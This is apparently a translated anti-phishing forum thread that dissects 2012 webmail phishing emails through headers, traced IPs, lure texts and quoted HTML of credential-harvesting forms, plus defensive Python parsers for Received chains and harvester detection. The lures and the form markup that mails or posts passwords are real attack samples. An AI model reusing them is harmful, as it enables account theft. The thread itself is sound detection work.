The Mugu has no clue about PHP either; he used the PHP form generator. Apparently that is only enough to buy a cracked server account...
Judging by the simple design, the Mugus need mail accounts again:
Header:
Received: from server.grupo.alborsgaliano.com (EHLO
 mx1.alborsgaliano.com) [62.15.74.235]
 by mx0.gmx.net (mx020) with SMTP; 10 Jan 2012 xx:xx:xx +0100
Received: from User ([81.149.250.213]) by mx1.alborsgaliano.com with
 Microsoft SMTPSVC(6.0.3790.4675);
 Mon, 9 Jan 2012 xx:xx:xx +0100
IP: 81.149.250.213 ---> host81-149-250-213.in-addr.btopenworld.com
IP: 204.93.211.58 ---> server102.routhost.com/Servercentral
Quote:
Dear Internet Users,
There is a current upgrade going on as the internet has so many scams going on this days and we are trying to wipe out all fraudulent activities.You may be a victim of fraud.
Please click this link below and enter the required information so your account will be free from internet activities as Microsoft and AOL with all internet bodies are putting head together to wipe away this activities caused by fraudster.
We are sorry for the trouble and wish to apologized to those whom have loss alot from it.
Regards,
Mrs. Lillian Burton
Interpol/Microsoft
Fraudulent Monitor Dept
In the source code you then find:
[HTML]<form method="POST" action="asap.php" onSubmit=""
webbot-action="--WEBBOT-SELF--">
<!--webbot bot="SaveResults" S-Email-Format="TEXT/PRE"
S-Email-Address="" B-Email-Label-Fields="TRUE"
B-Email-Subject-From-Field="FALSE" S-Email-Subject="all_logins"
S-Builtin-Fields S-Form-Fields="email passwd --by_Opsix-- "
U-Confirmation-Url="asap.php" startspan --><input name="VTI-GROUP"
value="1" type="hidden"><!--webbot bot="SaveResults" endspan
i-checksum="43406" -->
<p align="left">Email <font
color="#FFFFFF">
<input name="email" size="30" type="text"></font></p>
<p align="left">Password <font color="#FFFFFF">
<input name="passwd" size="30" type="password">
</font></p>
<p align="center"><font color="#FFFFFF"><input value="Submit"
name="B1" type="submit"></font></p>
</form>[/HTML]
So:
someone would like looooots of mail...
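The "IP: x ---> host" lines in these posts come from reading the Received: chain from the bottom up to the first hop that arrived from a public address. As an added example that is not part of the thread, here is a small Python parser that does exactly that on the header quoted in this post (embedded as a constructed sample with the forum's line numbers stripped and the timestamps masked as in the thread); the function names are my own.

```python
import ipaddress
import re

# Constructed sample: the Received chain quoted in the post above, with the
# forum's line numbers stripped and timestamps masked as in the thread.
SAMPLE_HEADERS = """\
Received: from server.grupo.alborsgaliano.com (EHLO mx1.alborsgaliano.com) [62.15.74.235]
 by mx0.gmx.net (mx020) with SMTP; 10 Jan 2012 xx:xx:xx +0100
Received: from User ([81.149.250.213]) by mx1.alborsgaliano.com with
 Microsoft SMTPSVC(6.0.3790.4675);
 Mon, 9 Jan 2012 xx:xx:xx +0100
"""
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def unfold(headers):
    """Join folded continuation lines (leading whitespace) onto their header."""
    out = []
    for raw in headers.splitlines():
        if raw[:1] in (" ", "\t") and out:
            out[-1] += " " + raw.strip()
        else:
            out.append(raw.rstrip())
    return out

def received_hops(headers):
    """Each Received: header as (from_clause, by_host, client_ips), newest first."""
    hops = []
    for line in unfold(headers):
        if not line.lower().startswith("received:"):
            continue
        body = line.split(":", 1)[1].strip()
        from_clause, _, rest = body.partition(" by ")
        by_host = rest.split()[0] if rest else ""
        # Only addresses inside the 'from' clause describe the connecting client;
        # anything after 'by' is the receiving server's own data.
        hops.append((from_clause, by_host, IPV4.findall(from_clause)))
    return hops

def injection_point(headers):
    """Walk the hops oldest to newest and return the first public client IP:
    the point where the mail entered the relay chain (the thread's 'IP: x ---> host')."""
    for _, _, ips in reversed(received_hops(headers)):
        for ip in ips:
            try:
                if not ipaddress.ip_address(ip).is_private:
                    return ip
            except ValueError:  # e.g. a version number that merely looks like an IP
                continue
    return None
```

Received lines below the first hop written by a server you trust can be forged by the sender, so the result is a lead for the abuse report, not proof.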
And because Google keeps supporting criminals despite the abuse report, the asterisk Mugu can calmly carry on phishing:
Header:
Received: from smtp.qmobile.vn (EHLO HCM-EXCHG-002.abtel.com.vn)
 [115.165.164.106]
 by mx0.gmx.net (mx057) with SMTP; 14 Jan 2012 xx:xx:xx +0100
Received: from User (81.149.250.213) by HCM-EXCHG-002.abtel.com.vn
 (10.1.1.30)
 with Microsoft SMTP Server ID: [ID filtered]
 +0700
IP: 81.149.250.213 ---> host81-149-250-213.in-addr.btopenworld.com
Quote:
*Dear Internet Users,*
*There is a current upgrade going on as the internet has so many scams going on this days and we are trying to wipe out all fraudulent activities.You may be a victim of fraud.*
*Please click this link below and enter the required information so your account will be free from internet activities as Microsoft and AOL with all internet bodies are putting head together to wipe away this activities caused by fraudster.*
IP: 204.93.211.58 ---> server102.routhost.com
There, in the source code:
[HTML]<!--webbot bot="SaveResults" S-Email-Format="TEXT/PRE"
S-Email-Address="" B-Email-Label-Fields="TRUE"
B-Email-Subject-From-Field="FALSE" S-Email-Subject="all_logins"
S-Builtin-Fields S-Form-Fields="email passwd --by_Opsix-- "
U-Confirmation-Url="asap.php" startspan --><input name="VTI-GROUP"
value="1" type="hidden"><!--webbot bot="SaveResults" endspan
i-checksum="43406" -->[/HTML]
New mailboxes are needed once again:
Header:
Received: from crystalfs.co.uk (mail.crystal-pbx.abc.net.uk [195.72.48.66])
 by xxxxx (Postfix) with ESMTP ID: [ID filtered]
 for xxxxx; Fri, 3 Feb 2012 xx:xx:xx +0100 (CET)
Received: from User ([204.188.217.215]) by crystalfs.co.uk with
 Microsoft SMTPSVC(6.0.3790.4675);
 Thu, 2 Feb 2012 xx:xx:xx +0000
IP: 204.188.217.215 ---> SHARKTECH INTERNET SERVICES
Quote:
Dear Webmail User
We noticed that your Emailaccount is opening in one other location with network IP address (94.108.200.195) click _HERE_ to logout the account from your mail box and block the IP from login in again from the address because if we continue to experience such problem your mail box will be completely closed.
Regards
Webmail Support Copyright [2011] [ Webmail Support Team]. All rights reserved
Mugus are active here too:
Header:
Received: from oms-mb01.r1000.mx.aol.com (oms-mb01.r1000.mx.aol.com
 [64.12.102.137])
 by xxxxx (Postfix) with ESMTP ID: [ID filtered]
 for xxxxx; Fri, 16 Mar 2012 xx:xx:xx +0100 (CET)
Received: from mtaout-db02.r1000.mx.aol.com
 (mtaout-db02.r1000.mx.aol.com [172.29.51.194])
 by oms-mb01.r1000.mx.aol.com (AOL Outbound OMS Interface) with ESMTP id
 2DB591C000086;
 Fri, 16 Mar 2012 xx:xx:xx -0400 (EDT)
Received: from User (unknown [190.24.150.251])
 by mtaout-db02.r1000.mx.aol.com (MUA/Third Party Client Interface) with
 ESMTPA ID: [ID filtered]
 Fri, 16 Mar 2012 xx:xx:xx -0400 (EDT)
X-AOL-IP: 190.24.150.251 ---> corporat190-024150251.sta.etb.net.co
Spamhaus says about that:
Online since 2 March; no admin can be that stupid, one has to assume intent here.
Quote:
190.24.150.248/29 is listed on the Spamhaus Block List (SBL)
2012-03-02 17:48:30 GMT | SR08 | etb.net.co
advance fee fraud spam origin at fundacion educativa taller5
Likely a trojaned system, used by criminals as an anonymising proxy to inject advance fee fraud ('419') spam into abused SMTP servers.
Quote:
You have a new account message _http://www.dokom21.de/account/profile_
Another (already failed) attempt:
Header:
Received: from newton.feg.unesp.br (newton.feg.unesp.br [200.145.11.2])
 by xxxxx (Postfix) with ESMTP ID: [ID filtered]
 Mon, 26 Mar 2012 xx:xx:xx +0200 (CEST)
Received: from webmail.feg.unesp.br (localhost.feg.unesp.br [127.0.0.1])
 by newton.feg.unesp.br (Postfix) with ESMTP ID: [ID filtered]
 Mon, 26 Mar 2012 xx:xx:xx -0300 (BRT)
Received: from 65.254.61.250
 (SquirrelMail authenticated user wcyro)
 by webmail.feg.unesp.br with HTTP;
 Mon, 26 Mar 2012 xx:xx:xx -0300 (BRT)
IP: 65.254.61.250 ---> GNAXNET
Header:
Received: from rfi.fmrp.usp.br (rfi.fmrp.usp.br [143.107.198.161])
 by xxxxx (Postfix) with ESMTP ID: [ID filtered]
 Mon, 26 Mar 2012 xx:xx:xx +0200 (CEST)
Received: from rfi.fmrp.usp.br (localhost.fmrp.usp.br [127.0.0.1])
 by rfi.fmrp.usp.br (Postfix) with ESMTP ID: [ID filtered]
 Mon, 26 Mar 2012 xx:xx:xx -0300 (BRT)
Quote:
Dear Account user,
We are updating our database and e-mail account center. We are deleting all unused E-mail account and create more space for new accounts. To ensure that you do not experience service disruption during this period, you need to click on the Validation link below and fill in your information:
Validation link:
You will receive confirmation of a new alphanumeric password that is only valid during this period, and may be changed by this process. We regret any inconvenience this may cost you.
Please reply to this message so we can give you better services online with our new and improved webmail functionality and improvements.
Webmail Upgrade Dept © 2012
Warning Code: ID 67565434.
The Mugus need mail accounts again:
Header:
Received: from outrelay03.libero.it (outrelay03.libero.it [212.52.84.103])
 by xxxxx (Postfix) with ESMTP ID: [ID filtered]
 Wed, 13 Jun 2012 xx:xx:xx +0200 (CEST)
The malicious link:
Quote:
You will not be able to send or to receive new e-mail until you increase your mailbox size. Click on University xxxxx/accupgrade
Technical Support 192.168.0.
IP: 112.78.117.8 ---> sv7.minibird.netowl.jp
And once again Mugu is busy as a phisher:
Header:
Received: from mout.perfora.net (mout.perfora.net [74.208.4.194])
 (using TLSv1 with cipher RC4-SHA (128/128 bits))
 (No client certificate requested)
 by xxxxx (Postfix) with ESMTPS ID: [ID filtered]
 for xxxxx; Mon, 29 Oct 2012 xx:xx:xx +0100 (CET)
Received: from winxedgeus02.exchange.xchg (winxedgeus02.lxa.perfora.net
 [172.23.130.34])
 by mrelay.perfora.net (node=mrus3) with ESMTP (Nemesis)
 ID: [ID filtered]
Received: from winxhubus04.exchange.xchg (172.23.130.36) by
 winxedgeus02.exchange.xchg (172.23.130.34) with Microsoft SMTP Server (TLS)
 ID: [ID filtered]
Received: from WINXBEUS26.exchange.xchg ([172.23.130.69]) by
 winxhubus04.exchange.xchg ([172.23.130.36]) with mapi; Mon, 29 Oct 2012
 xx:xx:xx -0400
IP: 213.174.157.200 ---> dev200.ucoz.net
Quote:
Your Mailbox Quota Has Exceeded The Set Quota/Limit Which Is 20GB.You Are Currently Running On 23GB Due To Hidden Files And Folder On Your Mailbox. Please Click the Link Below To Validate Your Mailbox And Increase Your Quota.
CLICK HERE:
Failure To Click This Link And Validate Your Quota May Result In Loss Of Important Information In Your Mailbox/Or Cause Limited Access To It.
Thanks
System Administrator.
There, a phishing page built with Formbuddy:
[HTML]<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post">[/HTML]
IP: 67.222.1.10 ---> host.formbuddydns.com
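The two form fragments quoted in this thread show the same harvesting pattern: a password field whose contents leave the page, either mailed out by a FrontPage SaveResults webbot (the S-Form-Fields="email passwd ..." comment) or posted to a third-party form relay such as formbuddy.com. As an added example, not from the thread or from any of the sites named in it, here is a Python check that flags both cases on constructed samples condensed from the quoted markup; the class and function names are my own.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed samples condensed from the two form fragments quoted in this thread.
WEBBOT_FORM = """<form method="POST" action="asap.php" webbot-action="--WEBBOT-SELF--">
<!--webbot bot="SaveResults" S-Email-Format="TEXT/PRE" S-Email-Address=""
 S-Email-Subject="all_logins" S-Form-Fields="email passwd --by_Opsix-- "
 U-Confirmation-Url="asap.php" startspan --><input name="VTI-GROUP" value="1" type="hidden">
<!--webbot bot="SaveResults" endspan i-checksum="43406" -->
<input name="email" type="text"><input name="passwd" type="password">
<input value="Submit" name="B1" type="submit"></form>"""
FORMBUDDY_FORM = ('<form action="http://www.formbuddy.com/cgi-bin/form.pl" method="post">'
                  '<input name="email" type="text"><input name="passwd" type="password"></form>')

class FormAudit(HTMLParser):
    """Record, per <form>, its action, whether it has a password field and the
    field list of any FrontPage SaveResults webbot comment inside it."""
    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            self.forms.append({"action": a.get("action", ""), "password": False, "saved": None})
        elif tag == "input" and self.forms and a.get("type", "").lower() == "password":
            self.forms[-1]["password"] = True

    def handle_comment(self, data):
        # The SaveResults webbot makes the FrontPage server extensions mail or
        # store exactly the fields listed in S-Form-Fields on every submit.
        m = re.search(r'bot="SaveResults".*?S-Form-Fields="([^"]*)"', data, re.S)
        if m and self.forms:
            self.forms[-1]["saved"] = m.group(1).split()

def audit(html, page_host):
    """Return one finding per form that looks like a credential harvester
    when served from page_host."""
    parser = FormAudit()
    parser.feed(html)
    findings = []
    for f in parser.forms:
        host = urlparse(f["action"]).netloc.lower()
        if f["password"] and host and host != page_host.lower():
            findings.append("password field posted off-site to " + host)
        if f["saved"] and any(x.lower().startswith("passw") for x in f["saved"]):
            findings.append("FrontPage SaveResults mails fields: " + " ".join(f["saved"]))
    return findings
```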
And once again obscured via Dot.tk. Where is the company based? In Amsterdam, of course, home of Leaseweb and also of RIPE. Oh, how liberal we are....
Header:
Received: from mail-out.iu17.org (mail-out.iu17.org [173.46.220.16])
 by xxxxx (Postfix) with ESMTP ID: [ID filtered]
 for xxxxx; Tue, 30 Oct 2012 xx:xx:xx +0100 (CET)
Received: from spam.iu17.org (localhost.localdomain [127.0.0.1])
 by spam.iu17.org (Postfix-out) with ESMTP ID: [ID filtered]
 Tue, 30 Oct 2012 xx:xx:xx -0400 (EDT)
X-Propel-Return-Path: <dulkins [at] IU17.ORG>
Received: from mail-out.iu17.org ([10.61.0.16])
 by [127.0.0.1] ([127.0.0.1]) (port 7027) (Abaca EPG outproxy filter
 3.1.1.9638 $Rev: 9577 $)
 ID: [ID filtered]
Received: from blastexchange.IU17.ORG (blastexchange.iu17.org [10.61.0.7])
 by spam.iu17.org (Postfix-out) with ESMTP ID: [ID filtered]
 Tue, 30 Oct 2012 xx:xx:xx -0400 (EDT)
Received: from blastexchange.IU17.ORG ([10.61.0.7]) by
 blastexchange.IU17.ORG
 ([10.61.0.7]) with mapi; Tue, 30 Oct 2012 xx:xx:xx -0400
goes via iframe to:
Quote:
Your Mailbox Quota Has Exceeded The Set Quota/Limit Which Is 20GB.You Are Currently Running On 23GB Due To Hidden Files And Folder On Your Mailbox. Please Click the Link Below To Validate Your Mailbox And Increase Your Quota.
CLICK HERE:
Failure To Click This Link And Validate Your Quota May Result In Loss Of Important Information In Your Mailbox/Or Cause Limited Access To It.
Thanks
System Administrator.
IP: 74.63.255.130 ---> 6te-freewebhostingarea-com.6te.net
new attempt:
Header:
Received: from exchange.bisd-tx.org (exchange.bisd-tx.org [64.123.96.67])
 (using TLSv1 with cipher AES128-SHA (128/128 bits))
 (No client certificate requested)
 by xxxxx (Postfix) with ESMTPS ID: [ID filtered]
 for xxxxx; Thu, 1 Nov 2012 xx:xx:xx +0100 (CET)
Received: from exchange.bisd-tx.local ([fe80::60db:c9fe:c69f:3746]) by
 exchange.bisd-tx.local ([fe80::60db:c9fe:c69f:3746%10]) with mapi; Thu,
 1 Nov
 2012 xx:xx:xx -0500
cracked:
IP: 69.50.219.228 ---> server2.vrns.net
Quote:
Your Mailbox Quota Has Exceeded The Set Quota/Limit Which Is 20GB.You Are Currently Running On 23GB Due To Hidden Files And Folder On Your Mailbox. Please Click the Link Below To Validate Your Mailbox And Increase Your Quota.
CLICK HERE:
Failure To Click This Link And Validate Your Quota May Result In Loss Of Important Information In Your Mailbox/Or Cause Limited Access To It.
Thanks
System Administrator.
In the source code:
[HTML]<!-- saved from url=(0060)http://stuartjohnsons.com/nupgrade/administrator_restore.htm -->[/HTML]
and the barn door is wide open, too: